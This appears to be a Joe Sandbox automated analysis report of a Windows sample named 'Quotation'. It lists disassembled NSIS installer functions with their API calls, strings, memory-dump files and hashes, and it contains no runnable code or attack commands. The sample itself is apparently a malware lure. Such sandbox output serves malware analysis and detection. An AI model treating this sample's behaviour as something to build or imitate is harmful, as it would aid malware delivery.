Call, xrefs: 00405EBA, 00405F88, 00405FAC, 00405FC1, 00405FD4, 00405FE7, 00406014, 0040604D, 00406054, 00406070, 00406083, 00406091, 004060A1, 004060A7, 004060CE, 004060EA

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
String ID: Call$Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4187626192-3890947278
Opcode ID: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
Instruction ID: e5fb9ae88836c379eadb94168964a2c41ebb3bf79b6cd8bfde1838e31315b013
Opcode Fuzzy Hash: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
Instruction Fuzzy Hash: 0E6115716442159BDB24AB288C40A3B76A4EF99350F11853FF982F72D1EB3CC9258B5E

Function 00405D18 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,00000000,?,?), ref: 00405D4A
lstrlenW.KERNEL32(?,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,00000000,?,?), ref: 00405D5C
lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,00000000,?,?), ref: 00405D77
SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll), ref: 00405D8F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405DB6
SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DD1
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405DDE

Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,?), ref: 0040604E

Strings

Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll, xrefs: 00405D35, 00405D43, 00405D49, 00405D71, 00405D76, 00405D7E, 00405D88

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$TextWindow
String ID: Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll
API String ID: 1759915248-4216733504
Opcode ID: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
Instruction ID: eb00d4876afd5f62942919e2a46038e7a2417e41af97232aca8a81e0ace8ac77
Opcode Fuzzy Hash: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
Instruction Fuzzy Hash: C7212672A056206BC310AF598D44E5BBBDCFF95310F04443FF988B3291C7B89D018BAA

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
wsprintfW.USER32 ref: 004061CF
LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004061E3

Strings

\, xrefs: 004061A4
UXTHEME, xrefs: 0040618B
%s%S.dll, xrefs: 004061C9

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

Function 00406A34 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406A50
GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CB2,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406A6B

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406A39
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3D
a, xrefs: 00406A49
n, xrefs: 00406A42

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user~1\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
API String ID: 1716503409-3496289110
Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
Instruction ID: 42be8ac81fa96e2418e52fe12c64c606f0e7da939330081f96b146de974569e0
Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
Instruction Fuzzy Hash: EDF05E72700208BBEB149F85DD09BEF7769EF91B10F15807BE945BA180E6B05E9487A4

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
GetProcAddress.KERNEL32(00000000), ref: 004068EE

Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004061E3

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004068C5
UXTHEME, xrefs: 004068C4, 004068D1, 004068DC

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

Function 00405E1C Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 00405E5D
GetLastError.KERNEL32 ref: 00405E67
SetFileSecurityW.ADVAPI32(?,80000007,?), ref: 00405E80
GetLastError.KERNEL32 ref: 00405E8E

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
Instruction ID: c5276d81fc3706eb17032c67a8bd40c2bbffd7631990a047acf891ba11bc5777
Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
Instruction Fuzzy Hash: 39011A74D00609DFDB109FA0DA44BAE7BB4EB04315F10443AD949F6190D77886488F99

Function 00406955 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,?,?,Call,00000000,00000000,00000002,00405F9C), ref: 0040699C
RegCloseKey.KERNELBASE(?), ref: 004069A7

Strings

Call, xrefs: 0040695A

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
Instruction ID: 1ae9e56a03760404e91669882a34a602e62d6bc2f034f3a498143100352ea1f7
Opcode Fuzzy Hash: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
Instruction Fuzzy Hash: F6015EB652010AABDF218FA4DD06EEF7BA8EF44354F110136F905E2260E334DA64DB94

Function 00405DFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user~1\AppData\Local\Temp\,00403CA7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00405E04
GetLastError.KERNEL32 ref: 00405E0E

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405DFC

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 1375471231-2382934351
Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
Instruction ID: 1d45a01f7acee8fa23fe776dff3dd1d011af88d7d8ca29917c3c3e776444c4f1
Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
Instruction Fuzzy Hash: 74C012326000309BC7602B65AE08A87BE94EB506A13068239B988E2220DA308C54CAE8

Function 73C6167A Relevance: 4.6, APIs: 3, Instructions: 123COMMON

Download Yara Rule

APIs

Part of subcall function 73C62351: GlobalFree.KERNEL32(?), ref: 73C62A44
Part of subcall function 73C62351: GlobalFree.KERNEL32(?), ref: 73C62A4A
Part of subcall function 73C62351: GlobalFree.KERNEL32(?), ref: 73C62A50

GlobalFree.KERNEL32(00000000), ref: 73C61738
FreeLibrary.KERNEL32(?), ref: 73C617C3
GlobalFree.KERNEL32(00000000), ref: 73C617E9

Part of subcall function 73C61FCB: GlobalAlloc.KERNEL32(?,?), ref: 73C61FFA

Part of subcall function 73C617F7: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,73C61708,00000000), ref: 73C6189A

Part of subcall function 73C61F1E: wsprintfW.USER32 ref: 73C61F51

Memory Dump Source

Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true

Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-0
Opcode ID: e699255d55c616ad2c8d2a79a15f05e654f8aa815d70d1d55e731c19fb9235a0
Instruction ID: 82c30a85497b223b3497ef2cf97e4d6588e352a79bb13e8ce9f2a4aded7dfa3b
Opcode Fuzzy Hash: e699255d55c616ad2c8d2a79a15f05e654f8aa815d70d1d55e731c19fb9235a0
Instruction Fuzzy Hash: EF41AD7640438DEFEB61EE25D8C4B9A37FDBB00322F158019F94EDE181DB74A984CA51

Function 00401399 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
Instruction ID: 15b31486c92c371a01b824ec8c308dd00c5fb3f6de234e3455dc008c55755f60
Opcode Fuzzy Hash: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
Instruction Fuzzy Hash: 2A01D472E542309BD7196F28AC09B2A2699A7C1711F15893EF901F72F1E6B89D01879C

Function 00406616 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05

Part of subcall function 00406BA3: CharNextW.USER32(?,?,?,00000000,007A4288,0040662D,007A4288,007A4288,?,?,?,00406719,?,00000000,771B3420,?), ref: 00406BB2
Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BB7
Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BD1

Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406D90
Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406DA4
Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,00403C8F,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406DBC

lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,771B3420,?), ref: 0040666A
GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B

Part of subcall function 004065AD: FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
Part of subcall function 004065AD: FindClose.KERNEL32(00000000), ref: 004065C4

Memory Dump Source

Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
String ID:
API String ID: 1879705256-0
